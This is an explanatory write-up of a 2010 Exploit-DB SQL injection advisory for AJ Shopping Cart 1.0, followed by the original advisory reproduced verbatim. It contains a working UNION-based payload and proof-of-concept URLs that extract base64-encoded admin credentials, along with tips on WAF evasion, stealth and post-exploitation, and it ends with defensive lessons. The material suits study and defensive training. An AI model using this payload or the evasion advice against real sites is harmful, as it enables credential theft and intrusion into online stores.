Understanding AJ Shopping Cart 1.0 SQL Injection

Understanding AJ Shopping Cart 1.0 SQL Injection
What this paper is
This paper details a SQL injection vulnerability found in AJ Shopping Cart version 1.0. The vulnerability allows an attacker to extract administrator credentials by manipulating the maincatid parameter. The exploit leverages a UNION SELECT statement to retrieve the admin_name and admin_password from the admin_table. The paper also notes that the retrieved password is base64 encoded.
Simple technical breakdown
The vulnerability lies in how the AJ Shopping Cart application handles user input for the maincatid parameter. When this parameter is used in a database query without proper sanitization, an attacker can inject malicious SQL code.
The exploit uses a technique called SQL Injection. Specifically, it's a UNION-based SQL Injection. This means the attacker:
- Breaks out of the intended query: By providing a value that causes an error or a specific condition (like
-99999), they can make the original query fail or return no results. - Injects a new query: Using the
UNION ALL SELECTclause, they append their own SQL query to the original one. - Retrieves sensitive data: Their injected query selects specific data (admin username and password) from a sensitive table (
admin_table). - Concatenates and displays: The
GROUP_CONCATfunction is used to combine multiple rows of results into a single string, separated by a colon, making it easier to exfiltrate. - Hides the rest of the query: The
--at the end comments out any remaining part of the original SQL query, preventing syntax errors.
Complete code and payload walkthrough
The core of the exploit is the malicious string injected into the maincatid parameter.
Exploit String:-99999/**/union/**/all/**/select/**/group_concat(admin_name,char(58),admin_password)v3n0m/**/from/**/admin_table--
Let's break this down:
-99999: This is a value likely chosen to ensure the original query (which probably expects a positive category ID) returns no results. This is a common technique to isolate the results of the injectedUNIONquery./**/: These are comments. In SQL, comments can be used to bypass certain filters or simply to add spaces without affecting the query's logic. Here, they act as space separators.union/**/all/**/select: This is the crucial part.UNION ALL: This operator combines the result set of two or moreSELECTstatements.ALLmeans it will include duplicate rows if they exist.SELECT: This initiates the selection of data.
group_concat(admin_name,char(58),admin_password): This is the data the attacker wants to retrieve.group_concat(): This function concatenates non-NULL values from a group into a single string.admin_name: This is the column containing the administrator's username.char(58): This inserts the ASCII character with decimal code 58, which is a colon (:). This character acts as a delimiter between the username and password.admin_password: This is the column containing the administrator's password.
v3n0m: This appears to be a marker or a username used by the author of the exploit, possibly to identify their injected data within the results. It's not standard SQL syntax for this purpose and might be a simple string literal that gets concatenated./**/from/**/admin_table: This specifies the table from which to retrieve the data.admin_table: This is the name of the table likely containing administrator credentials.
--: This is a SQL comment indicator. It tells the database to ignore everything that follows in the current query line. This is essential to prevent syntax errors caused by any leftover parts of the original query.
SQLi p0c (Proof of Concept) URLs:
The paper provides two example URLs:
http://127.0.0.1/[path]/?do=featured&action=showmaincatlanding&maincatid=[SQLi]http://127.0.0.1/[path]/?do=featured&action=showmaincatlanding&maincatid=-99999/**/union/**/all/**/select/**/group_concat(admin_name,char(58),admin_password)v3n0m/**/from/**/admin_table--
These URLs demonstrate how the exploit string is appended to the maincatid parameter. The [path] placeholder indicates the directory where the vulnerable script is located on the web server.
Password Encryption Note:** Password encrypted "base64_encode" **
This is a critical piece of information. The password retrieved by the exploit is not in plain text but is encoded using Base64. This means an attacker would need an additional step to decode it to get the actual password.
Mapping:
-99999: -> Ensures original query yields no results, isolating injected query output./**/: -> SQL comment, used here as a space to bypass potential filters and improve readability.union/**/all/**/select: -> Injects a new query to combine results with the original (or in this case, to provide its own results).group_concat(admin_name,char(58),admin_password): -> Selects and formats administrator username and password, separated by a colon.v3n0m: -> A literal string, likely a marker or identifier for the attacker./**/from/**/admin_table: -> Specifies the target table for data extraction.--: -> Comments out the rest of the original SQL query, preventing syntax errors.
Practical details for offensive operations teams
- Required Access Level: Unauthenticated access to the web application. The vulnerability is in a GET parameter, accessible via a web browser or automated tools.
- Lab Preconditions:
- A running instance of AJ Shopping Cart v1.0.
- A web server (e.g., Apache, Nginx) configured to serve the PHP application.
- A database (e.g., MySQL) connected to the application.
- An administrator account must exist in the
admin_table. - The
maincatidparameter must be present and vulnerable in the application's request handling.
- Tooling Assumptions:
- Web Browser: For manual testing and verification.
- Burp Suite / OWASP ZAP: For intercepting and modifying HTTP requests, automating payload delivery, and scanning.
- SQLMap: An automated SQL injection tool that can detect and exploit this type of vulnerability, including extracting data and handling encoding.
- Base64 Decoder: For decoding the retrieved password.
- Execution Pitfalls:
- WAF/IDS Evasion: Web Application Firewalls (WAFs) or Intrusion Detection Systems (IDS) might detect the pattern of
UNION SELECTor specific keywords. Using different comment styles (/*comment*/,-- comment,# comment) or character encoding might be necessary. The/**/style used in the exploit is a common evasion technique. - Parameter Filtering: The application might filter specific characters or keywords. The exploit uses
/**/to replace spaces, which can help bypass simple space-based filters. - Database Schema Variations: The table name (
admin_table) and column names (admin_name,admin_password) might differ in custom deployments. Reconnaissance to identify the correct schema is crucial. - Payload Length Limits: Some web servers or application frameworks might impose limits on URL length, which could affect the exploit string if it becomes too long.
- Base64 Decoding Errors: If the retrieved data is not Base64 encoded as expected, or if the decoding process is flawed, the password will not be revealed.
group_concatLimits: Thegroup_concat_max_lensystem variable in MySQL can limit the output length. If there are many admin users or very long usernames/passwords, the output might be truncated.
- WAF/IDS Evasion: Web Application Firewalls (WAFs) or Intrusion Detection Systems (IDS) might detect the pattern of
- Tradecraft Considerations:
- Reconnaissance: Identify the target application version and potential vulnerabilities. Google Dorks can be helpful, but the paper suggests "Use your brain & imagination."
- Targeted Testing: Focus on parameters that appear to be used in database queries, especially those that accept user-controlled input without clear sanitization.
- Stealth: Avoid noisy scanning if the target is sensitive. Manual testing or carefully configured automated tools are preferred.
- Data Exfiltration: The
group_concatfunction is efficient for exfiltrating multiple records at once. The colon delimiter aids in parsing. - Post-Exploitation: Once admin credentials are obtained, further actions depend on the engagement scope (e.g., gaining further access, data theft, privilege escalation).
Where this was used and when
- Software: AJ Shopping Cart v1.0
- Vendor: ajsquare.com
- Publication Date: April 22, 2010
- Exploit Published: April 23, 2010
- Context: This vulnerability was likely discovered and exploited in the wild around the time of its publication (early 2010). Such vulnerabilities in older, unpatched e-commerce platforms are common targets for attackers. The paper itself is a historical artifact from that period.
Defensive lessons for modern teams
- Input Validation and Sanitization: This is the most critical defense. All user-supplied input, especially data used in database queries, must be rigorously validated and sanitized. Use parameterized queries (prepared statements) to prevent SQL injection entirely.
- Least Privilege Principle: The database user account used by the web application should have only the minimum necessary privileges. It should not have direct access to sensitive tables like
admin_tableunless absolutely required, and even then, with strict controls. - Web Application Firewalls (WAFs): While not a foolproof solution, WAFs can detect and block common SQL injection patterns. Keep WAF rules updated.
- Regular Patching and Updates: Keep all web applications, frameworks, and server software up to date. Vendors often release patches for known vulnerabilities.
- Secure Coding Practices: Train developers on secure coding principles, including the dangers of SQL injection and how to prevent it.
- Database Security:
- Avoid storing sensitive data (like passwords) in plain text. Use strong hashing algorithms (e.g., bcrypt, Argon2) with salts.
- Monitor database logs for suspicious queries.
- Obfuscation is not Security: Relying on encoding (like Base64) for sensitive data without proper encryption or hashing is a weak security measure. The exploit explicitly mentions Base64 encoding, which is easily reversible.
ASCII visual (if applicable)
This exploit is a direct manipulation of a web request to a database. A visual representation of the data flow can be helpful.
+-----------------+ +-----------------+ +-----------------+ +-----------------+
| Attacker's |----->| Web Browser / |----->| Web Server |----->| Database Server |
| Machine | | Tool (e.g. | | (AJ Shopping | | (MySQL, etc.) |
| | | Burp Suite) | | Cart v1.0) | | |
+-----------------+ +-----------------+ +-----------------+ +-----------------+
| | |
| HTTP Request with Malicious `maincatid` | SQL Query | Data Retrieval
| (e.g., ...&maincatid=-99999/**/union/**/...) | (sanitized or not) | (admin_name,
| | | admin_password)
| | |
+----------------------------------------------------+----------------------+
|
v
+---------------------------------+
| Application Logic (PHP) |
| - Processes request |
| - Constructs/Executes SQL query |
| - Returns data (potentially) |
+---------------------------------+Source references
- Paper ID: 12349
- Paper Title: AJ Shopping Cart 1.0 (maincatid) - SQL Injection
- Author: v3n0m
- Published: 2010-04-22
- Paper URL: https://www.exploit-db.com/papers/12349
- Raw Exploit URL: https://www.exploit-db.com/raw/12349
Original Exploit-DB Content (Verbatim)
) ) ) ( ( ( ( ( ) )
( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /(
)\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())
((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ | |_ _|| \| | |/ /
\ V / (_) || (_ |\ V / / _ \ | (__ / _ \ | /| |) | _|| / |__ | | | .` | ' <
|_| \___/ \___| |_| /_/ \_\ \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
.WEB.ID
-----------------------------------------------------------------------
AJ Shopping Cart v1.0 (maincatid) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author : v3n0m
Site : http://yogyacarderlink.web.id/
Date : April, 23-2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
----------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : AJ Shopping Cart
Vendor : http://www.ajsquare.com/
Price : $1999.00 USD
Version : v1.0
Google Dork : Use your brain & imagination:)
The AJ Shopping Cart V 1.0 attracts many customers for developing their businesses. Our
php shopping cart is supplied with easy and vivid provisions to help the users with
all requirements listed for enhancing the business. The merits you can really
rely on success, complete establishment and enthralling growth in running a on line store.
There are steps taken to add more colors in the development of our shopping Cart.
It has come up with new features for controlling the store.
----------------------------------------------------------------
Exploit:
~~~~~~~
-99999/**/union/**/all/**/select/**/group_concat(admin_name,char(58),admin_password)v3n0m/**/from/**/admin_table--
SQLi p0c:
~~~~~~~
http://127.0.0.1/[path]/?do=featured&action=showmaincatlanding&maincatid=[SQLi]
http://127.0.0.1/[path]/?do=featured&action=showmaincatlanding&maincatid=-99999/**/union/**/all/**/select/**/group_concat(admin_name,char(58),admin_password)v3n0m/**/from/**/admin_table--
** Password encrypted "base64_encode"
----------------------------------------------------------------
Shoutz:
~~~~
- LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
- kiddies,whitehat,c4uR [aku benci dirimu, aku cinta martabak mu],mywisdom,yadoy666,udhit
- BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers)
- elicha cristia [kamu kemana aja? Mizz You :)]
- N.O.C & Technical Support @office
- #yogyacarderlink @irc.dal.net
----------------------------------------------------------------
Contact:
~~~~
v3n0m | YOGYACARDERLINK CREW | v3n0m666[0x40]live[0x2E]com
Homepage: http://yogyacarderlink.web.id/
http://v3n0m.blogdetik.com/
http://elich4.blogspot.com/ << Update donk >_<
---------------------------[EOF]--------------------------------